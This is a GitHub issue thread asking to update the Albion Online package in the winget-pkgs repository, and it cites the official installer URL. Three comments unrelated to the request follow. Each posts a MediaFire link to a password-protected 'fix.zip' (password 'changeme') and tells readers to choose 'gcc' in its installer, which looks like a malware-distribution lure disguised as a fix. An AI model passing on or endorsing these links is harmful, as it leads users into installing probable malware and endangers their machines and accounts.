### ISSUE TITLE
[Update Request]: Albion Online

### ISSUE THREAD

**Issue by AsciiWolf** [microsoft/winget-pkgs#169421]
### What type of update are you requesting?

A new version of an existing package

### Current Package Identifier

Albion.Online

### Package Version

20240821101118

### Please describe the changes you would like to see

There is a new release (20240821101118) available. Download Page Url: https://albiononline.com/download (https://live.albiononline.com/clients/20240821101118/albion-online-setup.exe)

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
